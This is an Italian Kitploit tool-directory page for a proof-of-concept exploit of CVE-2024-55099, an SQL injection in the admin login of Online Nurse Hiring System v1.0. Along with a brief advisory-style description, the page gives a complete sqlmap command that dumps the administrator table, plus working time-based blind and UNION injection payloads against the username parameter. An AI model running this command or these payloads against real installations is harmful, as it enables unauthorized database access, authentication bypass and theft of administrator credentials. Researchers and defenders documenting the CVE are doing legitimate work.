Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — Exploit proof-of-concept per CVE-2024-55099, che dimostra un'iniezione SQL nel Online Nurse Hiring System v1.0 attraverso un parametro username non sanitizzato, consentendo l'enumerazione del database e il bypass dell'autenticazione. | Kitploit
Strumenti/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

Exploit proof-of-concept per CVE-2024-55099, che dimostra un'iniezione SQL nel Online Nurse Hiring System v1.0 attraverso un parametro username non sanitizzato, consentendo l'enumerazione del database e il bypass dell'autenticazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

CVE-2024-55099-Sistema-Assunzione-Infermiere-Online-v1.0-Vulnerabilità-SQL-Injection

  • Autore dell'exploit: ugurkarakoc

Homepage del fornitore

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

Link del software

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

Panoramica

  • Online-Nurse-Hiring-System-v1.0 presenta una validazione e sanificazione insufficiente dei parametri 'username', creando una vulnerabilità ad attacchi di SQL injection, consentendo l'accesso non autorizzato al database e compromettendo la sicurezza del sistema.

Dettagli della vulnerabilità

  • CVE ID: CVE-2024-55099
  • Versione interessata: Online-Nurse-Hiring-System-v1.0
  • File vulnerabile: /admin/index.php.
  • Nomi dei parametri: username
  • Tipo di attacco: Locale

Riferimenti:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

Descrizione

  • La mancanza di una corretta validazione e sanificazione dei parametri 'username' consente a un attaccante di creare query SQL injection, bypassando i meccanismi di autenticazione e ottenendo accesso non autorizzato al database

Prova di concetto (PoC) :

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
root@kitploit:~
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

Scarica lo strumento